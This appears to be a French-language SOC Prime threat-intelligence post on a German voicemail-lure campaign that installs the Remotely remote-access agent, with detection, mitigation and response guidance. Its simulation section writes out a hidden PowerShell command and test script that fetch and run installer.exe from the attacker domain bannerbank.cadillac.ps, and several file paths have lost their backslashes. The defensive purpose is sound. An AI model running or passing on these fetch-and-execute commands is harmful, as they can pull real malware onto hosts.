SOC Prime Bias: Moyen

06 Feb 2026 16:41 UTC

Piège de Messagerie Vocale : Leur de Messagerie Vocale en Allemand Mène à un Accès à Distance

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
Piège de Messagerie Vocale : Leur de Messagerie Vocale en Allemand Mène à un Accès à Distance
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs menaçants hébergent des pages de destination en allemand « messagerie vocale » qui incitent les utilisateurs à télécharger un fichier BAT. Le script exécute un leurre audio bénin tout en installant discrètement l’outil de surveillance à distance Remotely. Une fois déployée, l’agent RMM offre à l’attaquant un accès distant persistant via une infrastructure C2 contrôlée par l’attaquant.

Enquête

Censys a identifié 86 propriétés web compromises sur les domaines *.cadillac.ps distribuant le BAT malveillant. Le script invoque un installateur PowerShell hébergé sur remotely.billbutterworth.com, qui extrait un package ZIP Remotely. L’archive contient les composants de l’agent Remotely et un service qui s’installe sous C:Program FilesRemotely.

Atténuation

Bloquez les domaines *.cadillac.ps et remotely.billbutterworth.com au niveau DNS/proxy. Formez les utilisateurs à ne pas exécuter de fichiers BAT inattendus ou à copier/coller des commandes PowerShell à partir de pages web inconnues. Déployez des contrôles de point de terminaison pour détecter la création de service Remotely et les chemins d’installation suspects ou les outils non signés.

Réponse

Alertez sur la création de Remotely_Service et la présence de Remotely_Agent.exe sous Program Files. Cherchez voicemail.bat et l’activité associée de l’installateur PowerShell. Isolez les hôtes affectés, collectez des artefacts judiciaires, et faites tourner/révoquez toutes les identifications ou les jetons utilisés par l’agent RMM.

Flux d’Attaque

Exécution de Simulation

Prérequis : La Vérification Préliminaire de Télémétrie & de Base doit avoir été validée.

Rationnel : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un diagnostic erroné.

  • Narrative & Commandes de l’Attaque :

    1. Livraison de Phishing : L’attaquant envoie un email avec une pièce jointe de leurre de messagerie vocale en allemand (HTML) qui, une fois ouvert, redirige la victime vers http://bannerbank.cadillac.ps/voicemail.html.
    2. Exécution de la Page de Destination : La page d’accueil héberge un script PowerShell en une ligne qui télécharge et exécute un installateur d’outil de gestion à distance (RMM).
    3. Création de Processus : Lorsque le navigateur de la victime traite la page, PowerShell est invoqué avec une ligne de commande qui inclut explicitement les deux chaînes que la règle surveille.
    4. Télémétrie Résultante : Windows enregistre l’ID d’événement 4688 avec une CommandLine contenant à la fois “page d’accueil sur le thème de la messagerie vocale” and “bannerbank.cadillac.ps”, satisfaisant ainsi la condition Sigma.

    La commande exacte utilisée pour la simulation :

    # Exécution malveillante simulée – contient les deux chaînes déclencheuses
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'page d'accueil sur le thème de la messagerie vocale'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`""
  • Script de Test de Régression : Un script PowerShell autonome qui reproduit l’attaque et peut être exécuté sur n’importe quel hôte Windows avec la journalisation requise activée.

    <#
    .SYNOPSIS
        Simule le leurre de messagerie vocale allemand qui déclenche la règle de détection Sigma.
    .DESCRIPTION
        Exécute une ligne de commande PowerShell contenant les deux sous-chaînes requises.
    #>
    
    # Définir les chaînes malveillantes
    $lureText = "page d’accueil sur le thème de la messagerie vocale"
    $maliciousDomain = "bannerbank.cadillac.ps"
    
    # Construire le script en une ligne qui apparaitra dans la ligne de commande
    $payload = @"
    Write-Host '$lureText';
    Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe;
    Start-Process $env:TEMPinstaller.exe
    "@
    
    # Lancer PowerShell avec la ligne de commande préparée
    $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`""
    Write-Host "Lancement de la commande PowerShell malveillante..."
    Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru
    
    # Optionnel : attendre quelques secondes pour s'assurer de la journalisation
    Start-Sleep -Seconds 5
  • Commandes de Nettoyage : Supprimez l’installateur téléchargé et tous les processus résiduels.

    # Arrêter tout processus d'installateur restant
    Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Supprimer le fichier installateur temporaire
    $installerPath = "$env:TEMPinstaller.exe"
    if (Test-Path $installerPath) {
        Remove-Item $installerPath -Force
        Write-Host "Nettoyé $installerPath"
    }